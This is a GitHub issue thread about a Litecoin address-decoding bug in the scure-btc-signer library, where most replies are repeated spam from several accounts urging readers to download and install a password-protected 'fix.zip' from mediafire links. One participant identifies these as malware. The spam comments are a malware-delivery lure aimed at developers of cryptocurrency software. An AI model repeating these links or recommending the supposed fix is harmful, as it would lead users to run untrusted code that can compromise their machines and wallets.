### ISSUE TITLE
Address.decode issue for LTC address

### ISSUE THREAD

**Issue by nikashitsa** [paulmillr/scure-btc-signer#112]
Hi, thanks for great lib!

I use it with Litecoin and faced issue when try to decode Litecoin address like this `LTCHodBXqzzfDvkL1kA3dHRVsx4SCL3Y13`
It's p2pkh address, but due to `bech32` for Litecoin is `ltc` it's treated as bech32 address here https://github.com/paulmillr/scure-btc-signer/blob/b38a853261a2b556f1b5ac7a9b3c7cdff59ddd2b/src/payment.ts#L722 and I get error below `Error: String must be lowercase or uppercase`.

I understand that this doesn't affect Bitcoin address decode, but probably you can make easy fix for this case also?

**Comment by toufiksalhi** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by deverchettychandrashekar** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by bitspill** [comment]
Yea, that's malware.... not even closely relevant to the issue

@paulmillr if you can hide/delete those messages. I'd hope no one here would download and run but can't be too sure

**Comment by deverchettychandrashekar** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by enricozao** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
